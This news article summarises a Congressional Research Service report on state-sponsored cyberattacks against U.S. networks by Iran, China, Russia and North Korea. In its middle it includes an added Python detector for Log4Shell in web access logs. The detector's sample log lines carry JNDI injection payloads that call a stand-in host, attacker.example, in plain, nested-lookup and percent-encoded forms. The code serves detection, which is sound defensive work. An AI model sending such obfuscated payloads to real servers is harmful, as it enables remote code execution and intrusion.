Iranian state-sponsored cyber activity continues to rank among the most persistent threats facing U.S. networks and critical infrastructure, according to a Congressional Research Service report examining major cyberattacks attributed to nation-state actors between 2012 and 2025. The report identifies Iran as one of the leading cyber adversaries tracked by U.S. intelligence agencies, alongside China, Russia, and North Korea, with campaigns targeting sectors ranging from telecommunications and defense to energy and industrial control environments.
Among the incidents cited are operations linked to the CyberAv3ngers group, affiliated with Iran's Islamic Revolutionary Guard Corps (IRGC), which targeted industrial control systems (ICS), including programmable logic controllers (PLCs), in critical infrastructure sectors such as water and wastewater.
The CRS analysis also highlights how Iranian government-sponsored actors have repeatedly exploited known software vulnerabilities and weakly secured systems to gain footholds inside U.S. critical infrastructure networks. In one campaign referenced by the report, Iranian actors exploited vulnerabilities in Microsoft Exchange and Fortinet products to access critical infrastructure organizations, then followed up with data exfiltration, ransomware encryption, and extortion.
The report warns that attribution remains difficult because state-backed actors frequently obscure their operations and rotate infrastructure, but notes that cyber operations tied to Iran increasingly combine espionage, disruption, and financially motivated tactics against both public- and private-sector targets.
“Nation-states are some of the most sophisticated actors that conduct cyberattacks. The Director of National Intelligence is required to provide Congress an annual assessment from the intelligence community on worldwide threats,” the CRS wrote in its report updated this week. “Recent assessments have highlighted cyberspace as an area of strategic concern, with the People’s Republic of China, the Russian Federation, the Democratic People’s Republic of Korea (North Korea), and the Islamic Republic of Iran as the leading threat actors.”
It added that attacks from these countries include spying on government agencies by accessing agency computers, stealing sensitive information from public and private-sector entities in the U.S., stealing intellectual property, and destroying or potentially destroying computer equipment.
“Nation-states may also direct private entities or criminal groups to carry out attacks to meet the goals of the country,” the CRS reported. “Cyber criminals are less resourced than nation-state actors and are less likely to employ novel and cutting-edge techniques in campaigns, yet their attacks are often highly effective. Most criminals are financially motivated and use cyberspace as a medium for conducting profit-bearing schemes. However, gaining money is not a requirement for illicit activity. Cyberattacks against victims in the United States from actors located abroad include compromising computers to create and maintain botnets, business email compromise schemes, hack and release campaigns, and ransomware attacks.”
The Director of National Intelligence is required to provide Congress with an annual intelligence community assessment of worldwide threats. Recent assessments identify cyberspace as a growing strategic concern, with China, Russia, North Korea, and Iran consistently identified as the leading state-backed cyber threat actors.
The CRS review outlines selected cyberattack campaigns against the U.S. between 2012 and 2025 that were attributed to nation-states or actors operating on their behalf. The country of residence for the perpetrator is included for each cyberattack campaign to highlight the geographic diversity of the attack origins. Some campaigns were perpetrated by criminal groups and others by individuals.
For those campaigns, the U.S. government determined that the actors were acting for personal gain rather than to benefit a state, which is what distinguishes them from the state-sponsored attacks in the list. These criminal campaigns include the compromise of computers to create and maintain botnets, business email compromise schemes, hack-and-release campaigns, and ransomware attacks.
The incidents include espionage targeting government agencies, theft of sensitive public- and private-sector data, intellectual property theft designed to benefit domestic industries, and operations intended to disrupt or damage computer systems and critical infrastructure. The review of these campaigns shows that state-sponsored cyber operations increasingly focus on critical infrastructure, telecommunications providers, defense contractors, healthcare organizations, and internet-connected systems.
The report identifies China, Russia, Iran, and North Korea as the most active state-linked cyber actors behind espionage, disruption, ransomware, credential theft, and infrastructure compromise campaigns. Among the recent incidents cited are the China-linked Salt Typhoon and Volt Typhoon operations, which targeted U.S. telecommunications companies and critical infrastructure environments. According to the report, Volt Typhoon actors compromised critical infrastructure systems to establish persistent access that could later be used to disrupt services if directed to do so, while Salt Typhoon actors infiltrated commercial telecommunications infrastructure to steal customer communications.
The report also highlights how Iran-linked cyber operations increasingly focus on operational technology (OT) and industrial control systems. One 2022 campaign attributed to the IRGC-affiliated CyberAv3ngers group targeted ICS used in critical infrastructure sectors, including water and wastewater facilities.
Another Iran-linked operation exploited the Log4Shell vulnerability in the Log4j logging library on an unpatched, internet-facing server of a federal civilian executive branch agency, then deployed cryptocurrency mining software and harvested credentials from the compromised network. The findings underscore broader concerns that nation-state cyber actors continue to exploit weak authentication practices, exposed internet-connected devices, software vulnerabilities, and supply chain trust relationships to gain long-term access into sensitive environments.
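The Log4Shell exploitation described above leaves a recognizable trace in web server logs: a `${jndi:...}` lookup string smuggled into a request header or parameter. The following is an added example, not code from the CRS report or from the article, showing a small Python detector that runs over constructed access-log lines and normalizes the common obfuscations (URL encoding, `${lower:...}` and `${upper:...}` wrappers, and `:-` default-value tricks) that defeat a naive substring match. The log lines, IP addresses and the attacker.example host are constructed for illustration and do not come from any real incident.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (illustrative only; not from any real incident).
# Lines 2-4 carry Log4Shell probes in plain, nested-lookup and percent-encoded form.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:14:03:40 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '198.51.100.8 - - [10/Dec/2021:14:04:02 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.9 - - [10/Dec/2021:14:05:19 +0000] "GET / HTTP/1.1" 200 512 "-" "%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fc%7D"',
    '203.0.113.6 - - [10/Dec/2021:14:06:00 +0000] "GET /docs/log4j-2.15.0-migration.html HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]

# ${lower:x} / ${upper:x} wrappers: the innermost ones contain no further "${", so
# repeated substitution unwraps nested lookups from the inside out.
_LOOKUP_WRAPPERS = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*)\s*\}", re.IGNORECASE)
# ${anything:-x} evaluates to x when the lookup fails, e.g. ${::-j} or ${env:NOPE:-j}.
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# The de-obfuscated form we actually want to flag, capturing the JNDI scheme (ldap, rmi, dns, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9]+)\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo URL encoding and Log4j lookup wrappers until the string stops changing."""
    for _ in range(max_rounds):
        previous = text
        text = unquote(text)
        text = _LOOKUP_WRAPPERS.sub(lambda m: m.group(1), text)
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
        if text == previous:
            break
    return text.lower()


def naive_match(line: str) -> bool:
    """The substring check many first-day Log4Shell signatures used; misses obfuscated probes."""
    return "${jndi:" in line.lower()


def find_log4shell_attempts(lines):
    """Return one record per log line that carries a (possibly obfuscated) JNDI lookup."""
    hits = []
    for line in lines:
        normalized = normalize(line)
        match = _JNDI.search(normalized)
        if match:
            hits.append({
                "src_ip": line.split(" ", 1)[0],   # first field of the combined log format
                "scheme": match.group(1),
                "normalized": normalized,
            })
    return hits


if __name__ == "__main__":
    for hit in find_log4shell_attempts(SAMPLE_LOG_LINES):
        print(f"{hit['src_ip']}  jndi-scheme={hit['scheme']}")
    print("naive substring check flags:",
          [naive_match(line) for line in SAMPLE_LOG_LINES])
```

The naive check only flags the second line; the normalizing detector also catches the nested-lookup and percent-encoded variants. In production the same normalization should be applied to every request header, not just the user agent, since the injected string can sit in any field the application logs.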
Russian cyber operations documented in the report span espionage, destructive attacks, ransomware, and supply chain compromises. The CRS table references campaigns including APT28, Star Blizzard, Snake malware, and APT29. Russian state-linked actors were accused of targeting logistics and technology companies supporting Ukraine, conducting long-term surveillance operations against NATO countries, exploiting multi-factor authentication misconfigurations to steal data, and infiltrating IT providers through trusted supply chain relationships.
The CRS report also references the Cyber Army of Russia Reborn campaign, which was tied to cyberattacks and distributed denial-of-service attacks against critical infrastructure organizations.
North Korean cyber activity described in the report combined financial crime with espionage and ransomware operations. Campaigns linked to North Korean actors targeted healthcare organizations with ransomware, used spear-phishing for intelligence collection, and infiltrated blockchain and cryptocurrency companies to steal funds.
The report also documents schemes in which North Korean operatives posed as remote IT workers to generate revenue for state programs. Separately, criminal cyber activity cited in the CRS review included ransomware campaigns such as REvil, Phobos, LockerGoga, MegaCortex, and Nefilim, alongside attacks involving botnets, credential theft, cryptocurrency laundering, and DDoS-for-hire services.
The CRS compilation further shows how cyber campaigns increasingly blur the lines between state-sponsored operations, financially motivated cybercrime, and hybrid influence activity. Examples cited in the report include the 2024 compromise of the U.S. Securities and Exchange Commission’s X account, which falsely announced approval of Bitcoin exchange-traded funds, as well as multiple ransomware and credential-theft schemes operated from countries including Russia, Ukraine, Romania, Moldova, and Switzerland. Across the documented incidents, the report repeatedly points to the exploitation of trusted systems, internet-facing infrastructure, stolen credentials, and poorly secured connected devices as recurring enablers of modern cyber operations.
The report also recognized that most criminals are financially motivated and use cyberspace as a medium for conducting profit-bearing schemes. “However, financial gain is not a requirement for illicit activity. Some malicious actors also victimize entities online without desires for payment, such as in hack-and-leak operations intended to embarrass the victim.”
Earlier this week, Redmond, Washington-based Microsoft said that it disrupted Fox Tempest, a malware-signing-as-a-service operation that helped cybercriminals make malicious software appear legitimate by abusing Microsoft’s code-signing infrastructure. The service, active since May 2025, was linked to widespread infections and network compromises globally and was used by ransomware groups and malware operators tied to families including Qilin, Akira, Lumma Stealer, Vidar, and Oyster.